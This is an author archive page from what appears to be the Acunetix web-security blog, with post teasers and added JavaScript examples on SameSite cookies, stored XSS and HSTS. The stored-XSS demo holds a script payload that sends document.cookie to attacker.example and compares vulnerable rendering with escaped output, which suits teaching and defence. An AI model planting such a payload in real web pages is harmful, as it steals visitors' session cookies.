You are a developer. You put a lot of effort into making sure that your code is safe. You never trust user input, and you use the best security-related development libraries. And then you make one small typo and everything is ruined. This is not fiction…
Author Archives: Tomasz Andrzej Nidecki
Protecting Your Website against Low Orbit Ion Cannon
The Low Orbit Ion Cannon (LOIC) is a tool that was developed by Praetox Technologies as a network stress testing application and then released into the public domain. This application is available as open source on Sourceforge.net and is often used by malicious parties for DoS…
PHP Security Guide
PHP remains the most popular server-side language for websites and web applications. According to the latest data from w3techs, it is used by 79% of websites whose server-side language is known. Therefore, secure PHP programming and configuration are of critical importance. There are more reasons,…
Chrome Tightens CSRF Protection
The Chrome 76 browser, which is expected in July 2019, will include tighter controls for the SameSite cookie attribute. This attribute is used by website or web application developers when they set cookies. It specifies whether the cookie may be sent in a third-party (cross-site) context…
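To make the SameSite semantics concrete, here is an added example in JavaScript (not code from the original post) that models the browser's decision: a Set-Cookie parser plus a function that says whether a cookie travels with a given request. The request object shape, the `legacyDefault` switch and the sample cookie strings are this example's own assumptions. An absent attribute is treated as Lax, the default Chrome introduced behind a flag in version 76 and enforced from version 80.

```javascript
// Added example (not from the original post): a simplified model of which
// cookies a browser attaches to a request under the SameSite rules.
// The request shape { crossSite, topLevelNavigation, method } and the
// "legacyDefault" switch are assumptions of this model, not browser APIs.

// Parse one Set-Cookie header value. Assumes a well-formed name=value pair.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const eq = parts[0].indexOf('=');
  const cookie = {
    name: parts[0].slice(0, eq).trim(),
    value: parts[0].slice(eq + 1).trim(),
    secure: false,
    sameSite: null, // null means the attribute was not set
  };
  for (const attr of parts.slice(1)) {
    const [key, val = ''] = attr.split('=').map((s) => s.trim().toLowerCase());
    if (key === 'secure') cookie.secure = true;
    if (key === 'samesite') {
      // Unrecognised values behave as if the attribute were absent.
      cookie.sameSite = ['strict', 'lax', 'none'].includes(val) ? val : null;
    }
  }
  return cookie;
}

const SAFE_METHODS = new Set(['GET', 'HEAD', 'OPTIONS', 'TRACE']);

// Returns true if the browser would attach the cookie to the request.
// legacyDefault=true models the old behaviour (no SameSite means no
// restriction); false models the tightened default (no SameSite means Lax).
function cookieIsSent(cookie, request, { legacyDefault = false } = {}) {
  // An explicit SameSite=None cookie without Secure is rejected at set time
  // (draft rfc6265bis), so it is never available to send.
  if (cookie.sameSite === 'none' && !cookie.secure) return false;
  const mode = cookie.sameSite !== null ? cookie.sameSite : (legacyDefault ? 'none' : 'lax');
  if (!request.crossSite) return true; // same-site requests always carry it
  switch (mode) {
    case 'strict':
      return false;
    case 'lax':
      // Lax allows cross-site top-level navigations with safe methods
      // (clicking a link), but not form POSTs, iframes or fetch() calls.
      return request.topLevelNavigation && SAFE_METHODS.has(request.method.toUpperCase());
    default:
      return true; // 'none'
  }
}

// Demo: a classic CSRF form post from an attacker-controlled page against a
// session cookie set without SameSite. The cookie header is constructed.
const session = parseSetCookie('session=abc123; Path=/; HttpOnly');
const csrfFormPost = { crossSite: true, topLevelNavigation: true, method: 'POST' };
console.log('legacy default sends cookie with CSRF POST:',
  cookieIsSent(session, csrfFormPost, { legacyDefault: true })); // true
console.log('Lax default sends cookie with CSRF POST:   ',
  cookieIsSent(session, csrfFormPost)); // false
```

Run it with node. The auto-submitted cross-site form POST receives the session cookie under the old default and not under Lax, while a cross-site link click (a top-level GET) still does, which is why Lax breaks few legitimate flows. Chrome's later "Lax+POST" two-minute exception for freshly set cookies is not modelled.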
Preventing NTP Reflection Attacks
The Network Time Protocol (NTP) is the standard protocol for time synchronization in the IT industry. It is widely used by servers, mobile devices, endpoints, and network devices, irrespective of their vendor. The latest version of NTP (version 4) is defined in RFC 5905. The…
What Is Persistent XSS
Persistent Cross-site Scripting (Stored XSS) attacks represent one of the three major types of Cross-site Scripting. The other two types are Non-Persistent XSS (Reflected XSS) and DOM-based XSS. In general, XSS attacks are based on the victim’s trust in a legitimate…
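As an added example (not from the original post), the following JavaScript illustrates the "persistent" part with an in-memory guestbook: a payload submitted once is stored server-side and rendered to every later visitor, with the vulnerable renderer next to a hardened one. The store, the function names and the payload string are constructed for this example.

```javascript
// Added example (not from the original post): an in-memory guestbook showing
// why Stored XSS is called persistent. Store shape, function names and the
// payload are constructed for this illustration.

// Simulates the server-side store (a database table in a real application).
function postComment(store, author, text) {
  store.push({ author, text }); // stored exactly as submitted
}

// Vulnerable: user-controlled strings are concatenated straight into HTML,
// so a stored payload executes in the browser of every visitor who loads the page.
function renderUnsafe(store) {
  return store.map((c) => `<li><b>${c.author}</b>: ${c.text}</li>`).join('\n');
}

// Encode the five characters that are significant in HTML element content.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened: the same data, escaped at output time for the HTML text context.
function renderSafe(store) {
  return store
    .map((c) => `<li><b>${escapeHtml(c.author)}</b>: ${escapeHtml(c.text)}</li>`)
    .join('\n');
}

// Demo: one malicious submission, then two independent page loads.
const guestbook = [];
postComment(guestbook, 'alice', 'Nice site!');
// Constructed payload; attacker.example is a reserved, non-routable name.
postComment(guestbook, 'mallory',
  "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>");
for (const visitor of ['bob', 'carol']) {
  // Every visitor receives the stored payload: that is what makes it persistent.
  console.log(`${visitor} sees (unsafe):\n${renderUnsafe(guestbook)}\n`);
}
console.log(`escaped output:\n${renderSafe(guestbook)}`);
```

The hardened renderer escapes for the HTML element-content context only; data placed into attributes, URLs or inline JavaScript needs the encoder for that context, and a Content Security Policy adds a second layer if an encoding step is missed.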
What Is HSTS and Why Should I Use It?
HSTS stands for HTTP Strict Transport Security. It is a method used by websites to declare that they should only be accessed using a secure connection (HTTPS). If a website declares an HSTS policy, the browser must automatically upgrade every plain HTTP request to that site to HTTPS and prevent users from…
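As an added example (not from the original post), the JavaScript below follows RFC 6797 to show what declaring an HSTS policy does on the client side: parsing the Strict-Transport-Security header, recording it only when it arrived over HTTPS, and rewriting later plain-HTTP requests to HTTPS. The Map-based store, the function names and the timeline are this example's assumptions; the preload list that real browsers ship is not modelled.

```javascript
// Added example (not from the original post): how a browser applies an HSTS
// policy, following RFC 6797. The in-memory Map store and the function names
// are this example's own; real browsers also ship a preload list, not modelled.

// Parse a Strict-Transport-Security header value, e.g.
// "max-age=31536000; includeSubDomains; preload". Returns null if invalid.
function parseHsts(value) {
  let maxAge = null;
  let includeSubDomains = false;
  let preload = false;
  for (const raw of value.split(';')) {
    const [name, val = ''] = raw.split('=').map((s) => s.trim());
    switch (name.toLowerCase()) {
      case 'max-age': {
        const digits = val.replace(/^"|"$/g, ''); // quoted-string form is allowed
        if (!/^\d+$/.test(digits)) return null;  // malformed: ignore the header
        maxAge = Number(digits);
        break;
      }
      case 'includesubdomains': includeSubDomains = true; break;
      case 'preload': preload = true; break;
      default: break; // unknown directives must be ignored
    }
  }
  if (maxAge === null) return null; // max-age is mandatory
  return { maxAge, includeSubDomains, preload };
}

// Record a policy from a response. The header only counts when the response
// itself came over HTTPS; over plain HTTP an on-path attacker could set or
// clear the policy, so RFC 6797 requires browsers to ignore it there.
function recordHsts(store, responseUrl, headerValue, nowMs) {
  const url = new URL(responseUrl);
  if (url.protocol !== 'https:') return false;
  const policy = parseHsts(headerValue);
  if (!policy) return false;
  const host = url.hostname.toLowerCase();
  if (policy.maxAge === 0) {
    store.delete(host); // max-age=0 tells the browser to forget the host
    return true;
  }
  store.set(host, {
    expires: nowMs + policy.maxAge * 1000,
    includeSubDomains: policy.includeSubDomains,
  });
  return true;
}

// Rewrite a plain-HTTP request URL to HTTPS if the host (or a parent domain
// with includeSubDomains) has an unexpired policy; otherwise return it as-is.
function enforceHsts(store, requestUrl, nowMs) {
  const url = new URL(requestUrl);
  if (url.protocol !== 'http:') return requestUrl;
  const labels = url.hostname.toLowerCase().split('.');
  for (let i = 0; i < labels.length; i++) {
    const domain = labels.slice(i).join('.');
    const policy = store.get(domain);
    if (!policy) continue;
    if (policy.expires <= nowMs) {
      store.delete(domain); // expired policy, drop it
      continue;
    }
    if (i === 0 || policy.includeSubDomains) {
      url.protocol = 'https:';
      if (url.port === '80') url.port = '443'; // explicit :80 becomes :443 (RFC 6797 8.3)
      return url.href;
    }
  }
  return requestUrl;
}

// Demo with a constructed timeline.
const store = new Map();
const now = Date.UTC(2019, 6, 1); // constructed "current time"
recordHsts(store, 'http://example.com/', 'max-age=31536000', now); // ignored: plain HTTP
recordHsts(store, 'https://example.com/', 'max-age=31536000; includeSubDomains', now);
console.log(enforceHsts(store, 'http://example.com/login', now));  // https://example.com/login
console.log(enforceHsts(store, 'http://api.example.com/v1', now)); // https://api.example.com/v1
console.log(enforceHsts(store, 'http://example.org/', now));       // http://example.org/ (no policy)
```

Two caveats worth keeping in mind: the very first visit over plain HTTP is still unprotected, which is the gap the preload list closes, and a header seen over HTTP is deliberately ignored, because otherwise a network attacker could clear the policy with max-age=0.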
XML External Entity Vulnerability in Internet Explorer
When exploiting a typical XML External Entity (XXE) vulnerability, the attacker attempts to gain access to the content of files on a Web server. However, XXE vulnerabilities may also allow the attacker to steal private data from the user. Such a case was recently discovered…
Visit Us at the Malta A.I. & Blockchain Summit 2019
Acunetix will be exhibiting at the Spring Edition of the Malta A.I. & Blockchain Summit. The event will take place on May 23-24 at the Hilton Business Centre in St. Julian’s in Malta. The summit focuses on AI, Big Data, Blockchain, IoT, and Quantum Technologies…